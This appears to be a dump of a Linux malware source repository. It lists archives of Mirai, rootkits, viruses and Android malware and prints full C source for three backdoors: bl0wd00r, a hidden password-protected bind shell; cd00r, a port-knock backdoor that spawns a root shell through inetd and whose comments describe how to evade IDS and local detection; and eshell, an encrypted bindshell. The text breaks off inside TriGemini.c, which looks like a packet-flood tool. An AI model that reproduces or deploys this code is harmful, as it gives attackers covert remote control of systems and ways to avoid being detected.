├── Android ├── Dendroid.rar └── gmbot.zip ├── Backdoors ├── blowdoor20.c ├── cd00r.c ├── eshell.c ├── icmp-backdoor.tar.gz ├── sneaky-sneaky-1.12.tar.gz ├── sneaky-sneaky-1.48.tar.gz └── udp_backdoor.tar.gz ├── Botnets └── InternetOfShit │ └── Mirai │ ├── loader.src.zip │ └── mirai.src.zip ├── ELF Magic └── ES-Malaria.tar.gz ├── LKMRootkits └── phalanx-b6.tar ├── Misc └── TriGemini.c ├── README.md └── Virus ├── 4553-invader-2.1.1.tar.gz └── skeksi_virus-master.zip /Android/Dendroid.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Android/Dendroid.rar -------------------------------------------------------------------------------- /Android/gmbot.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Android/gmbot.zip -------------------------------------------------------------------------------- /Backdoors/blowdoor20.c: -------------------------------------------------------------------------------- 1 | /*************************************************** 2 | * bl0wd00r v2.0 coded by bl0w (full version) 3 | * #offset @ BRASNet 4 | ***************************************************/ 5 | 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #define port 2424 // port to listen 16 | #define term "/bin/sh" // program to run 17 | #define logs "/dev/null" // dir of logs 18 | #define pass "61c8ec8adff5d92791f1b9308d7bef9f" // password encrypted with md5sum 19 | #define proc "-bash" // hidden syntax 20 | 21 | // thx for idea JNAX.C =) 22 | #define GETS(esp) gets(esp); esp[strlen(esp) -1] = '\0'; 23 | 24 | #define B 1024 25 | 26 | char a[36]; 27 | 28 | static void bala(const char *b, int dodnet2) { if (!strcmp(b, "exit")) { exit(0); } if (!strncmp(b, "cd ", 3)) { if (chdir(b +3) < 0) perror("chdir"); return ; } else { system(b); } } 29 | 30 | // retirado da md5 -inicio 31 | mdpass(char *aa) 32 | { 33 | FILE *temp; 34 | char mps[1024]; 35 | 36 | snprintf(mps, 1024, "/bin/echo -n %s|/usr/bin/md5sum", aa); 37 | temp = popen(mps, "r"); 38 | memset(a, 0, 36); 39 | fread(a, 32, 1, temp); 40 | fclose(temp); 41 | return a; 42 | } 43 | // -fim 44 | 45 | int main (int argc, char *argv[]) { 46 | 47 | int dodnet, dodnet2, size; 48 | struct sockaddr_in local; 49 | struct sockaddr_in remote; 50 | char cmd[256]; 51 | 52 | strcpy (argv[0], proc); 53 | signal (SIGCHLD, SIG_IGN); 54 | 55 | bzero (&local, sizeof(local)); 56 | local.sin_family = AF_INET; 57 | local.sin_port = htons (port); 58 | local.sin_addr.s_addr = INADDR_ANY; 59 | bzero (&(local.sin_zero), 8); 60 | 61 | if ((dodnet = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } 62 | if (bind (dodnet, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(1); } 63 | if (listen(dodnet, 5) == -1) { perror("listen"); exit(1); } 64 | 65 | size = sizeof(struct sockaddr_in); 66 | 67 | forkpid(); 68 | 69 | while (1) { 70 | if ((dodnet2 = accept (dodnet, (struct sockaddr *)&remote, &size)) == -1) { perror ("accept"); exit(1); } 71 | if (!fork ()) { 72 | 73 | char check[15], username[15]; 74 | int i; 75 | 76 | send (dodnet2, "username: ", sizeof("username: "), 0); 77 | recv (dodnet2, username, sizeof(username), 0); 78 | 79 | send (dodnet2, "password: ", sizeof("password: "), 0); 80 | recv (dodnet2, check, sizeof(check), 0); 81 | 82 | for (i = 0; i < strlen (check); i++) { 83 | if (check[i] == '\n' || check[i] == '\r') { 84 | check[i] = '\0'; 85 | } 86 | } 87 | for (i = 0; i < strlen (username); i++) { 88 | if (username[i] == '\n' || username[i] == '\r') { 89 | username[i] = '\0'; 90 | } 91 | } 92 | 93 | 94 | if (strncmp(mdpass(check), pass,32) != 0) { fuckoff(dodnet2, check, username); } 95 | else { getshell(dodnet2, username, dodnet); } 96 | } 97 | else { signal (SIGCHLD, SIG_IGN); close(dodnet2); } 98 | } 99 | close (dodnet2); 100 | exit(0); 101 | } 102 | 103 | forkpid() { 104 | int pid; 105 | signal(SIGCHLD,SIG_IGN); 106 | pid = fork(); 107 | if(pid>0) { 108 | sleep(1); 109 | exit(EXIT_SUCCESS); 110 | } 111 | if(pid == 0) { 112 | signal(SIGCHLD,SIG_DFL); 113 | return getpid(); 114 | } 115 | return -1; 116 | } 117 | 118 | fuckoff(int dodnet2, char *tentou, char *identifica) { 119 | FILE *aa; 120 | char a[B]; 121 | 122 | signal(SIGCHLD,SIG_IGN); 123 | 124 | aa=fopen(logs,"a+"); 125 | sprintf(a,"date>>%s",logs); 126 | system(a); 127 | 128 | fprintf(aa,"IDENTIFICOU-SE COMO: %s",identifica); 129 | fprintf(aa,"\nOCORRIDO: SENHA INCORRETA\n"); 130 | fprintf(aa,"TENTATIVA DE SENHA: %s",tentou); 131 | fprintf(aa,"\n-----------------------\n"); 132 | 133 | fclose(aa); 134 | close (dodnet2); 135 | exit(0); 136 | } 137 | 138 | 139 | getshell(int dodnet2, char *identifica) { 140 | FILE *aa; 141 | char a[B]; 142 | char b[BUFSIZ]; 143 | 144 | aa=fopen(logs,"a+"); 145 | sprintf(a,"date>>%s",logs); 146 | system(a); 147 | 148 | fprintf(aa,"IDENTIFICOU-SE COMO: %s",identifica); 149 | fprintf(aa,"\nOCORRIDO: ACESSO CONCEDIDO\n"); 150 | fprintf(aa,"\n-----------------------\n"); 151 | 152 | fclose(aa); 153 | 154 | close(0); 155 | close(1); 156 | close(2); 157 | 158 | dup2 (dodnet2, 0); 159 | dup2(dodnet2, 1); 160 | dup2(dodnet2, 2); 161 | 162 | for(;;) { 163 | printf("bash# "); 164 | GETS(b); 165 | bala(b,dodnet2); 166 | fflush(stdout); 167 | } 168 | } 169 | -------------------------------------------------------------------------------- /Backdoors/cd00r.c: -------------------------------------------------------------------------------- 1 | /* cdoor.c 2 | * packet coded backdoor 3 | * 4 | * FX of Phenoelit 5 | * http://www.phenoelit.de/ 6 | * (c) 2k 7 | * 8 | * $Id: cd00r.c,v 1.3 2000/06/13 17:32:24 fx Exp fx $ 9 | * 10 | * 11 | 'cd00r.c' is a proof of concept code to test the idea of a 12 | completely invisible (read: not listening) backdoor server. 13 | 14 | Standard backdoors and remote access services have one major problem: 15 | The port's they are listening on are visible on the system console as 16 | well as from outside (by port scanning). 17 | 18 | The approach of cd00r.c is to provide remote access to the system without 19 | showing an open port all the time. This is done by using a sniffer on the 20 | specified interface to capture all kinds of packets. The sniffer is not 21 | running in promiscuous mode to prevent a kernel message in syslog and 22 | detection by programs like AnitSniff. 23 | To activate the real remote access service (the attached code starts an 24 | inetd to listen on port 5002, which will provide a root shell), one has to 25 | send several packets (TCP SYN) to ports on the target system. Which ports 26 | in which order and how many of them can be defined in the source code. 27 | 28 | When port scanning the target, no open port will show up because there is 29 | no service listening. After sending the right SYN packets to the system, 30 | cd00r starts the listener and the port(s) is/are open. One nice side effect 31 | is, that cd00r does not care whenever the port used as code is open or not. 32 | Services running on ports used as code are still fully functional, but it's 33 | not a very good idea to use these ports as explained later. 34 | 35 | The best way to send the required SYN packets to the system is 36 | the use of nmap: 37 | ./nmap -sS -T Polite -p,, 38 | NOTE: the Polite timing ensures, that nmap sends the packets serial as 39 | defined. 40 | 41 | Details: 42 | Prevention of local detection is done by several things: 43 | First of all, the program gives no messages et all. It accepts only one 44 | configurable command line option, which will show error messages for 45 | the sniffer functions and other initialization stuff before 46 | the first fork(). 47 | All configuration is done in the first part of the source code as #defines. 48 | This leaves the target system without configuration files and the process 49 | does not show any command line options in the process table. When renaming 50 | the binary file to something like 'top', it is nearly invisible. 51 | 52 | The sniffer part of the code uses the LBNL libpcap and it's good filter 53 | functionality to prevent uninteresting traffic from entering the much 54 | slower test functions. By selecting higher, usually not used, ports as 55 | part of the code, the sniffer consumes nearly no processing time et all. 56 | 57 | Prevention of remote detection is primary the responsibility of the 58 | 'user'. By selecting more then 8 ports in changing order and in the 59 | higher range (>20000), it is nearly impossible to brute force these 60 | without rendering the system useless. 61 | Several configurable options support the defense against remote attacks: 62 | cd00r can look at the source address and (if defined) resets the code if 63 | a packet from another location arrives. By not using this function, one 64 | can activate the remote shell by sending the right packets from several 65 | systems, hereby flying below the IDS radar. 66 | Another feature is to reset or not reset the list of remaining ports 67 | (code list), if a false packet arrives. On heavy loaded systems this 68 | can happen often and would prevent the authorized sender to activate 69 | the remote shell. Again, when flying below the IDS radar, such 70 | functionality can be counterproductive because the usual way to 71 | prevent detection by an IDS is to send packets with long delays. 72 | 73 | What action cd00r actually takes is open to the user. The function 74 | cdr_open_door() is called without any argument. It fork()s twice 75 | to prevent zombies. Just add your code after the fork()s. 76 | 77 | The functionality outlined in these lines of terrific C source can 78 | be used for booth sides of the security game. If you have a system 79 | somewhere in the wild and you don't like to show open ports (except 80 | the usual httpd ;-) to the world, you may consider some modifications, 81 | so cd00r will provide you with a running ssh. 82 | On the other hand, one may like to create a backchanel, therefor never 83 | providing any kind of listening port on the system. 84 | 85 | Even the use of TCP SYN packets is just an example. Using the sniffer, 86 | one can easily change the opening conditions to something like two SYN, one 87 | ICMP echo request and five UDP packets. I personally like the TCP/SYN stuff 88 | because it has many possible permutations without changing the code. 89 | 90 | Compile it as: 91 | 92 | gcc -o -I/where/ever/bpf -L/where/ever/bpf cd00r.c -lpcap 93 | 94 | of for some debug output: 95 | 96 | gcc -DDEBUG -o -I/where/ever/bpf -L/where/ever/bpf cd00r.c -lpcap 97 | 98 | */ 99 | 100 | 101 | /* cd00r doesn't use command line arguments or a config file, because this 102 | * would provide a pattern to look for on the target systems 103 | * 104 | * instead, we use #defines to specifiy variable parameters such as interface 105 | * to listen on and perhaps the code ports 106 | */ 107 | 108 | /* the interface tp "listen" on */ 109 | #define CDR_INTERFACE "eth0" 110 | /* the address to listen on. Comment out if not desired 111 | * NOTE: if you don't use CDR_ADDRESS, traffic FROM the target host, which 112 | * matches the port code also opens the door*/ 113 | /* #define CDR_ADDRESS "192.168.1.1" */ 114 | 115 | /* the code ports. 116 | * These are the 'code ports', which open (when called in the right order) the 117 | * door (read: call the cdr_open_door() function). 118 | * Use the notation below (array) to specify code ports. Terminate the list 119 | * with 0 - otherwise, you really have problems. 120 | */ 121 | #define CDR_PORTS { 200,80,22,53,3,00 } 122 | 123 | /* This defines that a SYN packet to our address and not to the right port 124 | * causes the code to reset. On systems with permanent access to the internet 125 | * this would cause cd00r to never open, especially if they run some kind of 126 | * server. Additional, if you would like to prevent an IDS from detecting your 127 | * 'unlock' packets as SYN-Scan, you have to delay them. 128 | * On the other hand, not resetting the code means that 129 | * with a short/bad code the chances are good that cd00r unlocks for some 130 | * random traffic or after heavy portscans. If you use CDR_SENDER_ADDR these 131 | * chances are less. 132 | * 133 | * To use resets, define CDR_CODERESET 134 | */ 135 | #define CDR_CODERESET 136 | 137 | /* If you like to open the door from different addresses (e.g. to 138 | * confuse an IDS), don't define this. 139 | * If defined, all SYN packets have to come from the same address. Use 140 | * this when not defining CDR_CODERESET. 141 | */ 142 | #define CDR_SENDER_ADDR 143 | 144 | /* this defines the one and only command line parameter. If given, cd00r 145 | * reports errors befor the first fork() to stderr. 146 | * Hint: don't use more then 3 characters to pervent strings(1) fishing 147 | */ 148 | #define CDR_NOISE_COMMAND "noi" 149 | 150 | 151 | /**************************************************************************** 152 | * Nothing to change below this line (hopefully) 153 | ****************************************************************************/ 154 | #include 155 | #include 156 | #include 157 | #include 158 | #include 159 | #include /* for IPPROTO_bla consts */ 160 | #include /* for inet_ntoa() */ 161 | #include /* for inet_ntoa() */ 162 | #include /* for gethostbyname() */ 163 | #include /* for wait() */ 164 | #include /* for wait() */ 165 | 166 | #include 167 | #include 168 | 169 | #define ETHLENGTH 14 170 | #define IP_MIN_LENGTH 20 171 | #define CAPLENGTH 98 172 | 173 | 174 | 175 | struct iphdr { 176 | u_char ihl:4, /* header length */ 177 | version:4; /* version */ 178 | u_char tos; /* type of service */ 179 | short tot_len; /* total length */ 180 | u_short id; /* identification */ 181 | short off; /* fragment offset field */ 182 | u_char ttl; /* time to live */ 183 | u_char protocol; /* protocol */ 184 | u_short check; /* checksum */ 185 | struct in_addr saddr; 186 | struct in_addr daddr; /* source and dest address */ 187 | }; 188 | 189 | struct tcphdr { 190 | unsigned short int src_port; 191 | unsigned short int dest_port; 192 | unsigned long int seq_num; 193 | unsigned long int ack_num; 194 | unsigned short int rawflags; 195 | unsigned short int window; 196 | long int crc_a_urgent; 197 | long int options_a_padding; 198 | }; 199 | 200 | /* the ports which have to be called (by a TCP SYN packet), before 201 | * cd00r opens 202 | */ 203 | unsigned int cports[] = CDR_PORTS; 204 | int cportcnt = 0; 205 | /* which is the next required port ? */ 206 | int actport = 0; 207 | 208 | #ifdef CDR_SENDER_ADDR 209 | /* some times, looking at sender's address is desired. 210 | * If so, sender's address is saved here */ 211 | struct in_addr sender; 212 | #endif CDR_SENDER_ADDR 213 | 214 | /******** 215 | * cdr_open_door() is called, when all port codes match 216 | * This function can be changed to whatever you like to do when the system 217 | * accepts the code 218 | ********/ 219 | void cdr_open_door(void) { 220 | FILE *f; 221 | 222 | char *args[] = {"/usr/sbin/inetd","/tmp/.ind",NULL}; 223 | 224 | switch (fork()) { 225 | case -1: 226 | #ifdef DEBUG 227 | printf("fork() failed ! Fuck !\n"); 228 | #endif DEBUG 229 | return; 230 | case 0: 231 | /* To prevent zombies (inetd-zombies look quite stupid) we do 232 | * a second fork() */ 233 | switch (fork()) { 234 | case -1: _exit(0); 235 | case 0: /*that's fine */ 236 | break; 237 | default: _exit(0); 238 | } 239 | break; 240 | 241 | default: 242 | wait(NULL); 243 | return; 244 | } 245 | 246 | if ((f=fopen("/tmp/.ind","a+t"))==NULL) return; 247 | fprintf(f,"5002 stream tcp nowait root /bin/sh sh\n"); 248 | fclose(f); 249 | 250 | execv("/usr/sbin/inetd",args); 251 | #ifdef DEBUG 252 | printf("Strange return from execvp() !\n"); 253 | #endif DEBUG 254 | exit (0); 255 | 256 | } 257 | 258 | 259 | /* error function for pcap lib */ 260 | void capterror(pcap_t *caps, char *message) { 261 | pcap_perror(caps,message); 262 | exit (-1); 263 | } 264 | 265 | /* signal counter/handler */ 266 | void signal_handler(int sig) { 267 | /* the ugly way ... */ 268 | _exit(0); 269 | } 270 | 271 | void *smalloc(size_t size) { 272 | void *p; 273 | 274 | if ((p=malloc(size))==NULL) { 275 | exit(-1); 276 | } 277 | memset(p,0,size); 278 | return p; 279 | } 280 | 281 | 282 | /* general rules in main(): 283 | * - errors force an exit without comment to keep the silence 284 | * - errors in the initialization phase can be displayed by a 285 | * command line option 286 | */ 287 | int main (int argc, char **argv) { 288 | 289 | /* variables for the pcap functions */ 290 | #define CDR_BPF_PORT "port " 291 | #define CDR_BPF_ORCON " or " 292 | char pcap_err[PCAP_ERRBUF_SIZE]; /* buffer for pcap errors */ 293 | pcap_t *cap; /* capture handler */ 294 | bpf_u_int32 network,netmask; 295 | struct pcap_pkthdr *phead; 296 | struct bpf_program cfilter; /* the compiled filter */ 297 | struct iphdr *ip; 298 | struct tcphdr *tcp; 299 | u_char *pdata; 300 | /* for filter compilation */ 301 | char *filter; 302 | char portnum[6]; 303 | /* command line */ 304 | int cdr_noise = 0; 305 | /* the usual int i */ 306 | int i; 307 | /* for resolving the CDR_ADDRESS */ 308 | #ifdef CDR_ADDRESS 309 | struct hostent *hent; 310 | #endif CDR_ADDRESS 311 | 312 | 313 | 314 | /* check for the one and only command line argument */ 315 | if (argc>1) { 316 | if (!strcmp(argv[1],CDR_NOISE_COMMAND)) 317 | cdr_noise++; 318 | else 319 | exit (0); 320 | } 321 | 322 | /* resolve our address - if desired */ 323 | #ifdef CDR_ADDRESS 324 | if ((hent=gethostbyname(CDR_ADDRESS))==NULL) { 325 | if (cdr_noise) 326 | fprintf(stderr,"gethostbyname() failed\n"); 327 | exit (0); 328 | } 329 | #endif CDR_ADDRESS 330 | 331 | /* count the ports our user has #defined */ 332 | while (cports[cportcnt++]); 333 | cportcnt--; 334 | #ifdef DEBUG 335 | printf("%d ports used as code\n",cportcnt); 336 | #endif DEBUG 337 | 338 | /* to speed up the capture, we create an filter string to compile. 339 | * For this, we check if the first port is defined and create it's filter, 340 | * then we add the others */ 341 | 342 | if (cports[0]) { 343 | memset(&portnum,0,6); 344 | sprintf(portnum,"%d",cports[0]); 345 | filter=(char *)smalloc(strlen(CDR_BPF_PORT)+strlen(portnum)+1); 346 | strcpy(filter,CDR_BPF_PORT); 347 | strcat(filter,portnum); 348 | } else { 349 | if (cdr_noise) 350 | fprintf(stderr,"NO port code\n"); 351 | exit (0); 352 | } 353 | 354 | /* here, all other ports will be added to the filter string which reads 355 | * like this: 356 | * port <1> or port <2> or port <3> ... 357 | * see tcpdump(1) 358 | */ 359 | 360 | for (i=1;ilen<=(ETHLENGTH+IP_MIN_LENGTH)) continue; 450 | 451 | /* make it an ip packet */ 452 | ip=(struct iphdr *)(pdata+ETHLENGTH); 453 | /* if the packet is not IPv4, continue */ 454 | if ((unsigned char)ip->version!=4) continue; 455 | /* make it TCP */ 456 | tcp=(struct tcphdr *)(pdata+ETHLENGTH+((unsigned char)ip->ihl*4)); 457 | 458 | /* FLAG check's - see rfc793 */ 459 | /* if it isn't a SYN packet, continue */ 460 | if (!(ntohs(tcp->rawflags)&0x02)) continue; 461 | /* if it is a SYN-ACK packet, continue */ 462 | if (ntohs(tcp->rawflags)&0x10) continue; 463 | 464 | #ifdef CDR_ADDRESS 465 | /* if the address is not the one defined above, let it be */ 466 | if (hent) { 467 | #ifdef DEBUG 468 | if (memcmp(&ip->daddr,hent->h_addr_list[0],hent->h_length)) { 469 | printf("Destination address mismatch\n"); 470 | continue; 471 | } 472 | #else 473 | if (memcmp(&ip->daddr,hent->h_addr_list[0],hent->h_length)) 474 | continue; 475 | #endif DEBUG 476 | } 477 | #endif CDR_ADDRESS 478 | 479 | /* it is one of our ports, it is the correct destination 480 | * and it is a genuine SYN packet - let's see if it is the RIGHT 481 | * port */ 482 | if (ntohs(tcp->dest_port)==cports[actport]) { 483 | #ifdef DEBUG 484 | printf("Port %d is good as code part %d\n",ntohs(tcp->dest_port), 485 | actport); 486 | #endif DEBUG 487 | #ifdef CDR_SENDER_ADDR 488 | /* check if the sender is the same */ 489 | if (actport==0) { 490 | memcpy(&sender,&ip->saddr,4); 491 | } else { 492 | if (memcmp(&ip->saddr,&sender,4)) { /* sender is different */ 493 | actport=0; 494 | #ifdef DEBUG 495 | printf("Sender mismatch\n"); 496 | #endif DEBUG 497 | continue; 498 | } 499 | } 500 | #endif CDR_SENDER_ADDR 501 | /* it is the rigth port ... take the next one 502 | * or was it the last ??*/ 503 | if ((++actport)==cportcnt) { 504 | /* BINGO */ 505 | cdr_open_door(); 506 | actport=0; 507 | } /* ups... some more to go */ 508 | } else { 509 | #ifdef CDR_CODERESET 510 | actport=0; 511 | #endif CDR_CODERESET 512 | continue; 513 | } 514 | } /* end of main loop */ 515 | 516 | /* this is actually never reached, because the signal_handler() does the 517 | * exit. 518 | */ 519 | return 0; 520 | } 521 | -------------------------------------------------------------------------------- /Backdoors/eshell.c: -------------------------------------------------------------------------------- 1 | /* 2 | Program name : eshell v.01, 2000-12-19 3 | Tested on : linux 4 | Author : jenggo , #karet 5 | Require : libmix -- http://mixter.warrior2k.com 6 | Description : eshell, Encrypted bindshell daemon/client with 7 | AES crypto algorithm supported. 8 | It is popen(), NOT full I/O bash shell ... 9 | TODO : make full functional encrypted bindshell 10 | ( any ideas ? ) 11 | BUGS : if received data > max_size the output will truncated 12 | stderr is also truncated 13 | very very not optimized :P 14 | Compile : gcc eshell.c -o eshell -lmix -Wall 15 | Usage : ./eshell -h 16 | Thankie : echo, ularkasur #karet 17 | */ 18 | 19 | #include 20 | #define PORT 9990 /* port to listen or send */ 21 | #define PASS "taun baruan dimana ya ?" /* password, change this */ 22 | #define AES_ALG SAFERP /* AES Algorithm to use */ 23 | #define RECSIZE 65536 /* max size of received data, make sure its big enough */ 24 | #define SNDSIZE 4096 /* max command size */ 25 | 26 | void servermode (unsigned long to, int port); 27 | void clientmode (char *host, int port); 28 | void usage(char *cmd); 29 | 30 | void usage (char *cmd) 31 | { 32 | printf ("Usage: %s \n",cmd); 33 | printf ("Encrypted bindshell daemon/client with AES crypto algorithm supported\n"); 34 | printf ("if called without any argument will run into server mode\n\n"); 35 | printf (" %s\t\t -- client mode\n",cmd); 36 | printf (" \t\t\t host is hostname / IP to connect\n"); 37 | printf (" %s\t\t -- server mode\n",cmd); 38 | exit(0); 39 | } 40 | 41 | void servermode (unsigned long to, int port) 42 | { 43 | int i = 0, h, sock = socket (PF_INET, SOCK_STREAM, 0), insock, heh; 44 | char *p, *q, d[SNDSIZE*2]; 45 | struct sa sin; 46 | struct sa sout; 47 | FILE *com; 48 | fd_set dupfd; 49 | sin.fam = PF_INET; 50 | sin.add = to; 51 | sin.dp = htons(port); 52 | 53 | if((bind(sock,(struct sockaddr *)&sin,sizeof(sin))<0)) 54 | exit(printf("Bind error\n")); 55 | if((listen(sock,5))<0) 56 | exit(printf("Listen error\n")); 57 | heh=sizeof(struct sockaddr_in); 58 | 59 | /* init AES */ 60 | alg = AES_ALG; 61 | aes_key ((const char *)PASS); 62 | 63 | while (1) { 64 | 65 | if((insock=accept(sock, (struct sockaddr *)&sout, &heh)) == -1) 66 | { 67 | perror("accept"); 68 | exit(1); 69 | } 70 | 71 | signal(SIGHUP,SIG_IGN); 72 | signal(SIGCHLD,SIG_IGN); // zombies dead 73 | 74 | if(!fork()) { 75 | 76 | /* authenticate first */ 77 | memset(d,'\0', sizeof(d)); 78 | h=read(insock, d, sizeof(d)-1); 79 | i = strlen(d); 80 | p = (char *) aes_decrypt((const u1byte *) d, i); 81 | if ((strcmp(p, PASS)) < 0) 82 | { 83 | exit(0); 84 | } 85 | free(p); 86 | 87 | /* make it like a real shell :) */ 88 | while (1) 89 | { 90 | FD_ZERO(&dupfd); 91 | FD_SET(insock,&dupfd); 92 | FD_SET(STDIN_FILENO,&dupfd); 93 | select(insock+1,&dupfd,NULL,NULL,NULL); 94 | if (FD_ISSET(insock,&dupfd)) 95 | { 96 | memset(d,'\0', sizeof(d)); 97 | h=read(insock, d, sizeof(d)-1); 98 | if (h <= 0) 99 | exit(0); 100 | 101 | /* decrypt */ 102 | i = strlen(d); 103 | p = (char *) aes_decrypt((const u1byte *) d, i); 104 | 105 | /* build the command */ 106 | dup2(insock,2); 107 | com = popen (p,"r"); 108 | free (p); 109 | while (!feof(com)) 110 | { 111 | memset(d,'\0', sizeof(d)); 112 | fread (d, 1, sizeof(d)-1, com); 113 | 114 | /* encrypt it */ 115 | i = strlen(d); 116 | q = (char *) aes_encrypt((const u1byte *) d, &i); 117 | 118 | /* send the result */ 119 | write (insock, q, strlen(q)); 120 | free (q); 121 | // sleep(1); 122 | } 123 | pclose(com); 124 | } 125 | } 126 | } 127 | } 128 | } 129 | 130 | void clientmode (char *host, int port) 131 | { 132 | int i = 0, h, sock = socket (PF_INET, SOCK_STREAM, 0); 133 | char *p,*g; 134 | struct sa sin; 135 | fd_set dupfd; 136 | sin.fam = PF_INET; 137 | sin.add = resolve (host); 138 | sin.dp = htons(PORT); 139 | 140 | /* init AES */ 141 | alg = AES_ALG; 142 | aes_key ((const char *)PASS); 143 | 144 | (void) connect(sock, (struct sockaddr *) &sin, sizeof(sin)); 145 | 146 | /* send encrypted pass */ 147 | i = strlen(PASS); 148 | p = (char *) aes_encrypt((const u1byte *) PASS, &i); 149 | (void) write (sock, p, strlen(p)); 150 | free(p); 151 | 152 | while (1) 153 | { 154 | FD_ZERO(&dupfd); 155 | FD_SET(sock,&dupfd); 156 | FD_SET(STDIN_FILENO,&dupfd); 157 | select(sock+1,&dupfd,NULL,NULL,NULL); 158 | /* read from socket */ 159 | if (FD_ISSET(sock,&dupfd)) 160 | { 161 | if ((g=malloc(RECSIZE)) < 0) 162 | { 163 | printf("malloc()\n"); 164 | exit(0); 165 | } 166 | memset(g, '\0', RECSIZE); 167 | h=read(sock,g,RECSIZE-1); 168 | if (h <= 0) 169 | exit(0); 170 | 171 | /* decrypt it */ 172 | i = strlen(g); 173 | p = (char *) aes_decrypt((const u1byte *) g, i); 174 | 175 | printf("%s",p); 176 | free (p); 177 | free (g); 178 | } 179 | /* read from stdin */ 180 | if (FD_ISSET(STDIN_FILENO,&dupfd)) 181 | { 182 | if ((g=malloc(SNDSIZE)) < 0) 183 | { 184 | printf("malloc()\n"); 185 | exit(0); 186 | } 187 | memset(g, 0, SNDSIZE); 188 | h=read(STDIN_FILENO,g, SNDSIZE); 189 | if (h > 0) 190 | { 191 | /* encrypt it */ 192 | i = strlen(g); 193 | p = (char *) aes_encrypt((const u1byte *) g, &i); 194 | (void) write (sock, p, strlen(p)); 195 | free(p); 196 | free(g); 197 | } 198 | } 199 | } 200 | } 201 | 202 | int main (int argc, char **argv) 203 | { 204 | unsigned long lh; 205 | if (argc > 1) 206 | { 207 | if ( (strcmp(argv[1],"-h") == 0) || (strcmp(argv[1],"--help") == 0) ) 208 | { 209 | usage(argv[0]); 210 | exit(0); 211 | } 212 | else 213 | { 214 | if ( (strlen(argv[1]) < 65) && (argc == 2)) 215 | { 216 | printf ("Remember it is sh -c \"your commands\" , not full I/O shell !\n"); 217 | printf ("Client mode: \n"); 218 | clientmode (argv[1], PORT); 219 | } 220 | else 221 | { 222 | printf ("error: bad hostname\n"); 223 | usage (argv[0]); 224 | exit(0); 225 | } 226 | } 227 | } 228 | else 229 | { 230 | lh = resolve ("localhost"); 231 | servermode (lh, PORT); 232 | } 233 | return 0; 234 | } 235 | -------------------------------------------------------------------------------- /Backdoors/icmp-backdoor.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Backdoors/icmp-backdoor.tar.gz -------------------------------------------------------------------------------- /Backdoors/sneaky-sneaky-1.12.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Backdoors/sneaky-sneaky-1.12.tar.gz -------------------------------------------------------------------------------- /Backdoors/sneaky-sneaky-1.48.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Backdoors/sneaky-sneaky-1.48.tar.gz -------------------------------------------------------------------------------- /Backdoors/udp_backdoor.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Backdoors/udp_backdoor.tar.gz -------------------------------------------------------------------------------- /Botnets/InternetOfShit/Mirai/loader.src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Botnets/InternetOfShit/Mirai/loader.src.zip -------------------------------------------------------------------------------- /Botnets/InternetOfShit/Mirai/mirai.src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Botnets/InternetOfShit/Mirai/mirai.src.zip -------------------------------------------------------------------------------- /ELF Magic/ES-Malaria.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/ELF Magic/ES-Malaria.tar.gz -------------------------------------------------------------------------------- /LKMRootkits/phalanx-b6.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/LKMRootkits/phalanx-b6.tar -------------------------------------------------------------------------------- /Misc/TriGemini.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #ifdef F_PASS 7 | #include 8 | #endif 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #ifndef __USE_BSD 15 | # define __USE_BSD 16 | #endif 17 | #ifndef __FAVOR_BSD 18 | # define __FAVOR_BSD 19 | #endif 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #ifdef LINUX 27 | # define FIX(x) htons(x) 28 | #else 29 | # define FIX(x) (x) 30 | #endif 31 | #define PSIZE 65535 32 | #define TCP_ACK 1 33 | #define TCP_FIN 2 34 | #define TCP_SYN 4 35 | #define TCP_RST 8 36 | #define UDP_CFF 16 37 | #define ICMP_ECHO_G 32 38 | #define TCP_NOF 64 39 | #define TCP_URG 128 40 | #define TCP_PSH 258 41 | #define TCP_ECE 512 42 | #define TCP_CWR 1024 43 | #define GRE_CFF 2048 44 | #define TH_NOF 0x0 45 | #define TH_FIN 0x01 46 | #define TH_SYN 0x02 47 | #define TH_RST 0x04 48 | #define TH_PUSH 0x08 49 | #define TH_ACK 0x10 50 | #define TH_URG 0x20 51 | #define TH_ECE 0x40 52 | #define TH_CWR 0x80 53 | #define TCP_ATTACK() (a_flags & TCP_ACK ||\ 54 | a_flags & TCP_FIN ||\ 55 | a_flags & TCP_SYN ||\ 56 | a_flags & TCP_RST ||\ 57 | a_flags & TCP_NOF ||\ 58 | a_flags & TCP_PSH ||\ 59 | a_flags & TCP_ECE ||\ 60 | a_flags & TCP_CWR ||\ 61 | a_flags & TCP_URG ) 62 | #define UDP_ATTACK() (a_flags & UDP_CFF) 63 | #define GRE_ATTACK() (a_flags & GRE_CFF) 64 | #define ICMP_ATTACK() (a_flags & 